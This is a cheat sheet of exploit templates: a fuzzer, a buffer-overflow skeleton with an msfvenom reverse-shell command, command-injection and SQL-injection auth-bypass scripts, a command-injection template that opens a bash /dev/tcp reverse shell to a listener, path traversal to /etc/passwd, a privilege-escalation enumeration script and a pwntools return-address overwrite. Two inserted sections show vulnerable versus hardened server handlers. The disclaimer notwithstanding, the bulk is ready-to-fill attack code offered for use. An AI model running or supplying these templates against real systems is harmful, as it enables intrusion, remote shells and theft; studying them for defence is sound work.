Exploit Template Snippets — Build, Fire, Pwn
⚠️ For educational and authorized use only. These templates are designed to help you understand exploit logic, structure, and automation — not for unauthorized testing.
I. 🧩 Exploit Workflow Anatomy

1. Enumeration: identify service, port, version, input vector.
2. Fuzzing: trigger a crash with a payload.
3. Debugging: attach a debugger (gdb/Immunity).
4. Exploit Development: build the PoC (controlled crash → EIP control → RCE).
5. Weaponization: add reverse shell, privilege escalation, persistence.
II. 🧠 Python Exploit Template — TCP / Socket PoC

#!/usr/bin/env python3
import socket

target = "10.10.10.5"
port = 1337
payload = b"A" * 100  # initial fuzz buffer

print(f"[+] Connecting to {target}:{port}")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)  # do not hang forever if the service is already down
s.connect((target, port))
print("[+] Sending payload...")
s.sendall(payload)  # sendall() loops until every byte is written; send() may write only part
print("[+] Payload sent. Check target.")
s.close()

III. 🧱 Python Fuzzing Skeleton
#!/usr/bin/env python3
import socket
import time

ip = "10.10.10.5"
port = 9999
buffer = b"A" * 100  # start small and grow by 100 bytes per round

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((ip, port))
        s.sendall(buffer)
        print(f"[+] Sent {len(buffer)} bytes")
        s.close()
        time.sleep(1)
        buffer += b"A" * 100
    except OSError as exc:
        # a refused/reset connection or a timeout means the last buffer most likely crashed the service
        print(f"[!] Crashed at {len(buffer)} bytes! ({exc})")
        break

✅ Use this to find the crash point; then pin down the exact offset with !mona pattern_create / pattern_offset.
IV. 🧠 Buffer Overflow Skeleton (Python)

#!/usr/bin/env python3
import socket

target = "10.10.10.5"
port = 9999
offset = 524  # bytes of padding until EIP is overwritten (from pattern_offset)
retn = b"\xf3\x12\x17\x31"  # address of a JMP ESP, little endian
nop = b"\x90" * 16  # NOP sled so the jump lands safely in front of the shellcode
shellcode = b""  # msfvenom payload goes here

payload = b"A" * offset + retn + nop + shellcode

print(f"[+] Sending exploit to {target}:{port}")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendall(payload)
s.close()

🔹 Example msfvenom command

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -b "\x00" -f python

V. ⚙️ Bash Exploit Template (Network)
#!/bin/bash
# Basic socket exploit example
host="10.10.10.5"
port=8080
payload="GET /vuln?cmd=id HTTP/1.1\r\nHost: $host\r\n\r\n"
# -e expands the \r\n sequences; quote the variables so nc receives them as single arguments
echo -e "$payload" | nc "$host" "$port"

VI. 🧠 Exploit Skeleton — Web Command Injection
import requests

url = "http://target/vuln.php"
cmd = "id"
payload = {"cmd": f"$( {cmd} )"}  # command substitution wrapped around the injected command

r = requests.post(url, data=payload, timeout=10)
print(r.text)

Enhancements:
Add threading for brute-force.
Integrate reverse shell or file upload for escalation.
VII. 🧩 Exploit Skeleton — Format String

#!/usr/bin/env python3
import socket
import struct


def p(x):
    """Pack a 32-bit value little endian (for placing an address in the payload later)."""
    return struct.pack("<I", x)


target = ("10.10.10.5", 1337)
payload = b"%p " * 10  # test for a format string vuln: leaked stack values come back as pointers

s = socket.socket()
s.settimeout(5)
s.connect(target)
s.sendall(payload)
print(s.recv(4096))
s.close()

VIII. 🧱 C Exploit Skeleton (Linux Socket)
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

int main(void) {
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        perror("socket");
        return 1;
    }

    struct sockaddr_in server;
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons(1337);
    server.sin_addr.s_addr = inet_addr("10.10.10.5");

    if (connect(s, (struct sockaddr *)&server, sizeof(server)) < 0) {
        perror("connect");
        close(s);
        return 1;
    }

    /* payload is not NUL-terminated, so pass its size explicitly instead of strlen() */
    char payload[512];
    memset(payload, 'A', sizeof(payload));
    send(s, payload, sizeof(payload), 0);

    close(s);
    return 0;
}

Compile:

gcc exploit.c -o exploit

IX. 🧠 Python Exploit Template — Auth Bypass / SQLi
import requests

url = "http://target/login"
payload = "' OR '1'='1"  # closes the string literal and appends an always-true condition
data = {"username": payload, "password": "pass"}

r = requests.post(url, data=data, timeout=10)
if "Welcome" in r.text:
    print("[+] Auth bypass successful")
else:
    print("[-] Failed")
X. 🧩 Exploit Template — Command Injection → Reverse Shell

import requests

target = "http://10.10.10.5/vuln"
lhost = "10.10.14.3"
lport = "4444"
# interactive bash with stdin/stdout/stderr redirected over /dev/tcp to the listener
cmd = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
payload = {"cmd": cmd}

requests.post(target, data=payload, timeout=10)
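The server-side bug that sections VI and X rely on, shown from the defender's side as an added Python example (not from the original page): a hypothetical handler that splices a request parameter into a shell command, beside the hardened version that validates the value against an allowlist and passes it as an argv entry with no shell. A harmless constructed probe, $(echo INJECTED), makes the difference visible, and a small blocklist matcher shows why metacharacter filtering on its own is weaker than the allowlist.

```python
# Added example, not from the original page: the server-side handler pattern that the
# cmd-parameter templates (sections VI and X) depend on, beside a hardened version.
# Hypothetical handler: it greets a name taken from a request parameter via echo.
import re
import subprocess

NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")  # allowlist of what a name may contain
SHELL_META_RE = re.compile(r"[;&|`$<>(){}]|/dev/tcp/")  # blocklist of common shell syntax

PROBE = "$(echo INJECTED)"  # constructed, harmless probe: the substitution only echoes a word


def greet_vulnerable(name):
    # The parameter is spliced into one command string and handed to /bin/sh, so
    # command substitution, ';', '|' and redirections inside it are executed.
    result = subprocess.run("echo Hello " + name, shell=True,
                            capture_output=True, text=True)
    return result.stdout.strip()


def greet_argv_only(name):
    # No shell at all: the value reaches echo as one literal argument, whatever it contains.
    result = subprocess.run(["echo", "Hello", name], capture_output=True, text=True)
    return result.stdout.strip()


def greet_safe(name):
    # Validate against the allowlist first, then use the argv form.
    if not NAME_RE.fullmatch(name):
        raise ValueError("invalid name")
    return greet_argv_only(name)


def safe_rejects(name):
    """True when greet_safe refuses the value."""
    try:
        greet_safe(name)
    except ValueError:
        return True
    return False


def suspicious_parameter(value):
    # Blocklist matching is handy for flagging request logs, but it is not a control:
    # a plain "id" matches nothing and would still run on the vulnerable handler.
    return SHELL_META_RE.search(value) is not None


if __name__ == "__main__":
    print("vulnerable :", greet_vulnerable(PROBE))   # Hello INJECTED
    print("argv only  :", greet_argv_only(PROBE))    # Hello $(echo INJECTED)
    print("allowlist  :", "rejected" if safe_rejects(PROBE) else greet_safe(PROBE))
    print("flagged    :", suspicious_parameter("bash -i >& /dev/tcp/10.10.14.3/4444 0>&1"))
```

The two defences stack: the argv form removes the shell parser that makes the injection possible, and the allowlist keeps unexpected values out of the process entirely, so the blocklist is left with its proper role of surfacing attempts in the logs.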
XI. ⚙️ Exploit Template — LFI to RCE

import requests

url = "http://target/vuln?file="
path = "../../../../../../etc/passwd"  # traversal out of the web root to a known file

r = requests.get(url + path, timeout=10)
print(r.text)

Combine with /proc/self/environ or PHP session inclusion for RCE.
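The include/read pattern the template abuses, from the defender's side, as an added Python example that is not part of the original page: a hypothetical file reader that joins the request path onto a base directory without checks, beside one that resolves the path and refuses anything outside the base. It runs against a temporary directory holding one constructed file.

```python
# Added example, not from the original page: an unchecked file read beside a reader that
# pins every request under a base directory. Hypothetical handler; runs against a
# temporary directory holding one constructed file.
import os
import tempfile

TRAVERSAL = "../../../../../../etc/passwd"  # the template's path


def resolve_vulnerable(base_dir, requested):
    # os.path.join walks upward without complaint, so ".." steps escape base_dir.
    return os.path.realpath(os.path.join(base_dir, requested))


def read_vulnerable(base_dir, requested):
    with open(resolve_vulnerable(base_dir, requested)) as f:
        return f.read()


def resolve_safe(base_dir, requested):
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # realpath collapses ".." and symlinks; the result must still lie under base.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return candidate


def read_safe(base_dir, requested):
    with open(resolve_safe(base_dir, requested)) as f:
        return f.read()


def safe_rejects(base_dir, requested):
    """True when resolve_safe refuses the request."""
    try:
        resolve_safe(base_dir, requested)
    except ValueError:
        return True
    return False


def demo():
    """Exercise both readers inside a scratch directory and return the outcomes."""
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "about.txt"), "w") as f:
            f.write("public page")  # constructed content
        return {
            "safe_normal_read": read_safe(base, "about.txt"),
            "safe_rejects_traversal": safe_rejects(base, TRAVERSAL),
            "safe_rejects_nested_traversal": safe_rejects(base, "pages/../../../../../../../etc/passwd"),
            # ".." that stays inside the base is fine, so this one is not rejected
            "safe_rejects_dotdot_within_base": safe_rejects(base, "pages/../about.txt"),
            # where the vulnerable reader would end up; not opened here
            "vulnerable_resolves_to": resolve_vulnerable(base, TRAVERSAL),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Checking the resolved path rather than the raw string is what matters: filtering "../" out of the input can be bypassed by nesting or encoding, whereas the realpath comparison judges where the open() would actually land.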
XII. 🧩 Privilege Escalation Automation Skeleton (Linux)

#!/bin/bash
echo "[+] Starting PrivEsc..."
whoami                                # current user
sudo -l                               # sudo rules granted to this user
find / -perm -4000 2>/dev/null        # SUID binaries
find / -type f -writable 2>/dev/null  # files the current user can write
cat /etc/crontab                      # scheduled jobs
getcap -r / 2>/dev/null               # binaries with file capabilities
echo "[+] Done."

XIII. ⚡ Exploit Output Parsing Template
import re
import subprocess

# argument list instead of shell=True: the target name is never parsed by a shell
output = subprocess.run(["nmap", "-sV", "target"], capture_output=True, text=True, check=True).stdout
matches = re.findall(r"(\d+)/tcp\s+open\s+(\S+)", output)
for port, service in matches:
    print(f"[+] Port {port} running {service}")

XIV. 🧠 Exploit Development Checklist
1️⃣ Fuzz the input (crash discovery)
2️⃣ Find offset (EIP overwrite)
3️⃣ Identify bad chars
4️⃣ Find JMP ESP or pivot gadget
5️⃣ Build payload (shellcode + NOP sled)
6️⃣ Validate with debugger
7️⃣ Automate exploitation
8️⃣ Add reverse shell or file write
XV. 🧱 Useful Libraries for Exploit Dev

pwntools: exploit development & automation
requests: web-based exploits
socket: network connections
struct: packing/unpacking addresses
subprocess: local command execution
re: regex parsing for responses
ctypes: low-level binary handling
XVI. ⚡ Pwntools Example Template

from pwn import *

context(arch='amd64', os='linux')  # set before packing so p64()/flat() use the right word size
target = process('./vuln')
offset = 72  # bytes of padding before the saved return address
payload = flat({offset: p64(0xdeadbeef)})  # filler up to offset, then the return address
target.sendline(payload)
target.interactive()